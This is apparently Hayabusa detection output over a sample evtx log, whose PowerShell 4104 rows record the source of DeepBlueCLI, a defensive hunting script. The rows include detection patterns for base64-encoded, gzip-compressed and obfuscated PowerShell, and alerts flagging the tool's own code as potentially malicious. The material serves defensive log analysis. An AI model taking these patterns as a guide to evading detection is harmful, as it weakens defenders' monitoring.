$eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:37.545 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:37.547 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:23:59.512 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:23:59.512 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:23:59.513 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:23:59.514 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:24:04.587 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:25:39.074 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:25:40.257 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:25:40.262 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logna",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:25:40.262 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logna",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:25:40.262 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"me=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to 